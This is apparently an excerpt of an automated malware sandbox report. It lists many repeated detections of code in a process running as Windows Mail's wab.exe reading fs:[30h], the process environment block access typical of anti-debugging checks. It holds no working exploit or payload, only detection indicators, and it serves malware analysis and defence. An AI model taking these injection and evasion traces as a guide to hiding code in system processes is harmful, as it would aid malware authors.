              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]26_2_21C883C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]26_2_21C883C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]26_2_21C883C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C883C0 mov eax, dword ptr fs:[00000030h]26_2_21C883C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D063C0 mov eax, dword ptr fs:[00000030h]26_2_21D063C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3C3CD mov eax, dword ptr fs:[00000030h]26_2_21D3C3CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C903E9 mov eax, dword ptr fs:[00000030h]26_2_21C903E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D553FC mov eax, dword ptr fs:[00000030h]26_2_21D553FC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB63FF mov eax, dword ptr fs:[00000030h]26_2_21CB63FF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E3F0 mov eax, dword ptr fs:[00000030h]26_2_21C9E3F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E3F0 mov eax, dword ptr fs:[00000030h]26_2_21C9E3F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E3F0 mov eax, dword ptr fs:[00000030h]26_2_21C9E3F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA438F mov eax, dword ptr fs:[00000030h]26_2_21CA438F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA438F mov eax, dword ptr fs:[00000030h]26_2_21CA438F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7E388 mov eax, dword ptr fs:[00000030h]26_2_21C7E388
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7E388 mov eax, dword ptr fs:[00000030h]26_2_21C7E388
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7E388 mov eax, dword ptr fs:[00000030h]26_2_21C7E388
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C78397 mov eax, dword ptr fs:[00000030h]26_2_21C78397
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C78397 mov eax, dword ptr fs:[00000030h]26_2_21C78397
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C78397 mov eax, dword ptr fs:[00000030h]26_2_21C78397
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CD739A mov eax, dword ptr fs:[00000030h]26_2_21CD739A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CD739A mov eax, dword ptr fs:[00000030h]26_2_21CD739A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB33A0 mov eax, dword ptr fs:[00000030h]26_2_21CB33A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB33A0 mov eax, dword ptr fs:[00000030h]26_2_21CB33A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA33A5 mov eax, dword ptr fs:[00000030h]26_2_21CA33A5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7D34C mov eax, dword ptr fs:[00000030h]26_2_21C7D34C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7D34C mov eax, dword ptr fs:[00000030h]26_2_21C7D34C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]26_2_21D0035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]26_2_21D0035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]26_2_21D0035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0035C mov ecx, dword ptr fs:[00000030h]26_2_21D0035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]26_2_21D0035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]26_2_21D0035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79353 mov eax, dword ptr fs:[00000030h]26_2_21C79353
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79353 mov eax, dword ptr fs:[00000030h]26_2_21C79353
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D55341 mov eax, dword ptr fs:[00000030h]26_2_21D55341
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2437C mov eax, dword ptr fs:[00000030h]26_2_21D2437C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3F367 mov eax, dword ptr fs:[00000030h]26_2_21D3F367
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C87370 mov eax, dword ptr fs:[00000030h]26_2_21C87370
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C87370 mov eax, dword ptr fs:[00000030h]26_2_21C87370
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C87370 mov eax, dword ptr fs:[00000030h]26_2_21C87370
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBA30B mov eax, dword ptr fs:[00000030h]26_2_21CBA30B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBA30B mov eax, dword ptr fs:[00000030h]26_2_21CBA30B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBA30B mov eax, dword ptr fs:[00000030h]26_2_21CBA30B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7C310 mov ecx, dword ptr fs:[00000030h]26_2_21C7C310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA0310 mov ecx, dword ptr fs:[00000030h]26_2_21CA0310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0930B mov eax, dword ptr fs:[00000030h]26_2_21D0930B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0930B mov eax, dword ptr fs:[00000030h]26_2_21D0930B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0930B mov eax, dword ptr fs:[00000030h]26_2_21D0930B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAF32A mov eax, dword ptr fs:[00000030h]26_2_21CAF32A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C77330 mov eax, dword ptr fs:[00000030h]26_2_21C77330
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4132D mov eax, dword ptr fs:[00000030h]26_2_21D4132D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4132D mov eax, dword ptr fs:[00000030h]26_2_21D4132D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]26_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]26_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]26_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]26_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]26_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]26_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]26_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]26_2_21C8A2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]26_2_21C8A2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]26_2_21C8A2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]26_2_21C8A2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]26_2_21C8A2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C892C5 mov eax, dword ptr fs:[00000030h]26_2_21C892C5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C892C5 mov eax, dword ptr fs:[00000030h]26_2_21C892C5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B2D3 mov eax, dword ptr fs:[00000030h]26_2_21C7B2D3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B2D3 mov eax, dword ptr fs:[00000030h]26_2_21C7B2D3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B2D3 mov eax, dword ptr fs:[00000030h]26_2_21C7B2D3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAF2D0 mov eax, dword ptr fs:[00000030h]26_2_21CAF2D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAF2D0 mov eax, dword ptr fs:[00000030h]26_2_21CAF2D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C902E1 mov eax, dword ptr fs:[00000030h]26_2_21C902E1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C902E1 mov eax, dword ptr fs:[00000030h]26_2_21C902E1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C902E1 mov eax, dword ptr fs:[00000030h]26_2_21C902E1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3F2F8 mov eax, dword ptr fs:[00000030h]26_2_21D3F2F8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D552E2 mov eax, dword ptr fs:[00000030h]26_2_21D552E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C792FF mov eax, dword ptr fs:[00000030h]26_2_21C792FF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE284 mov eax, dword ptr fs:[00000030h]26_2_21CBE284
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE284 mov eax, dword ptr fs:[00000030h]26_2_21CBE284
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D00283 mov eax, dword ptr fs:[00000030h]26_2_21D00283
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D00283 mov eax, dword ptr fs:[00000030h]26_2_21D00283
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D00283 mov eax, dword ptr fs:[00000030h]26_2_21D00283
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB329E mov eax, dword ptr fs:[00000030h]26_2_21CB329E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB329E mov eax, dword ptr fs:[00000030h]26_2_21CB329E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D55283 mov eax, dword ptr fs:[00000030h]26_2_21D55283
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C902A0 mov eax, dword ptr fs:[00000030h]26_2_21C902A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C902A0 mov eax, dword ptr fs:[00000030h]26_2_21C902A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]26_2_21C952A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]26_2_21C952A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]26_2_21C952A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]26_2_21C952A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D092BC mov eax, dword ptr fs:[00000030h]26_2_21D092BC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D092BC mov eax, dword ptr fs:[00000030h]26_2_21D092BC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D092BC mov ecx, dword ptr fs:[00000030h]26_2_21D092BC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D092BC mov ecx, dword ptr fs:[00000030h]26_2_21D092BC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]26_2_21D162A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D162A0 mov ecx, dword ptr fs:[00000030h]26_2_21D162A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]26_2_21D162A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]26_2_21D162A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]26_2_21D162A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]26_2_21D162A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D172A0 mov eax, dword ptr fs:[00000030h]26_2_21D172A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D172A0 mov eax, dword ptr fs:[00000030h]26_2_21D172A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3B256 mov eax, dword ptr fs:[00000030h]26_2_21D3B256
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3B256 mov eax, dword ptr fs:[00000030h]26_2_21D3B256
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB724D mov eax, dword ptr fs:[00000030h]26_2_21CB724D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79240 mov eax, dword ptr fs:[00000030h]26_2_21C79240
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79240 mov eax, dword ptr fs:[00000030h]26_2_21C79240
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C86259 mov eax, dword ptr fs:[00000030h]26_2_21C86259
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D08243 mov eax, dword ptr fs:[00000030h]26_2_21D08243
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D08243 mov ecx, dword ptr fs:[00000030h]26_2_21D08243
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7A250 mov eax, dword ptr fs:[00000030h]26_2_21C7A250
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C84260 mov eax, dword ptr fs:[00000030h]26_2_21C84260
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C84260 mov eax, dword ptr fs:[00000030h]26_2_21C84260
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C84260 mov eax, dword ptr fs:[00000030h]26_2_21C84260
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7826B mov eax, dword ptr fs:[00000030h]26_2_21C7826B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC1270 mov eax, dword ptr fs:[00000030h]26_2_21CC1270
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC1270 mov eax, dword ptr fs:[00000030h]26_2_21CC1270
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA9274 mov eax, dword ptr fs:[00000030h]26_2_21CA9274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB7208 mov eax, dword ptr fs:[00000030h]26_2_21CB7208
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB7208 mov eax, dword ptr fs:[00000030h]26_2_21CB7208
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D55227 mov eax, dword ptr fs:[00000030h]26_2_21D55227
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7823B mov eax, dword ptr fs:[00000030h]26_2_21C7823B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D535D7 mov eax, dword ptr fs:[00000030h]26_2_21D535D7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D535D7 mov eax, dword ptr fs:[00000030h]26_2_21D535D7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D535D7 mov eax, dword ptr fs:[00000030h]26_2_21D535D7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE5CF mov eax, dword ptr fs:[00000030h]26_2_21CBE5CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE5CF mov eax, dword ptr fs:[00000030h]26_2_21CBE5CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB55C0 mov eax, dword ptr fs:[00000030h]26_2_21CB55C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA95DA mov eax, dword ptr fs:[00000030h]26_2_21CA95DA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C865D0 mov eax, dword ptr fs:[00000030h]26_2_21C865D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBA5D0 mov eax, dword ptr fs:[00000030h]26_2_21CBA5D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBA5D0 mov eax, dword ptr fs:[00000030h]26_2_21CBA5D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D555C9 mov eax, dword ptr fs:[00000030h]26_2_21D555C9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFD5D0 mov eax, dword ptr fs:[00000030h]26_2_21CFD5D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFD5D0 mov ecx, dword ptr fs:[00000030h]26_2_21CFD5D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBC5ED mov eax, dword ptr fs:[00000030h]26_2_21CBC5ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBC5ED mov eax, dword ptr fs:[00000030h]26_2_21CBC5ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C825E0 mov eax, dword ptr fs:[00000030h]26_2_21C825E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB4588 mov eax, dword ptr fs:[00000030h]26_2_21CB4588
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0B594 mov eax, dword ptr fs:[00000030h]26_2_21D0B594
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0B594 mov eax, dword ptr fs:[00000030h]26_2_21D0B594
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7758F mov eax, dword ptr fs:[00000030h]26_2_21C7758F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7758F mov eax, dword ptr fs:[00000030h]26_2_21C7758F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7758F mov eax, dword ptr fs:[00000030h]26_2_21C7758F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C82582 mov eax, dword ptr fs:[00000030h]26_2_21C82582
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C82582 mov ecx, dword ptr fs:[00000030h]26_2_21C82582
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE59C mov eax, dword ptr fs:[00000030h]26_2_21CBE59C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]26_2_21CA15A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]26_2_21CA15A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]26_2_21CA15A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]26_2_21CA15A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]26_2_21CA15A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]26_2_21D135BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]26_2_21D135BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]26_2_21D135BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]26_2_21D135BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3F5BE mov eax, dword ptr fs:[00000030h]26_2_21D3F5BE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D005A7 mov eax, dword ptr fs:[00000030h]26_2_21D005A7
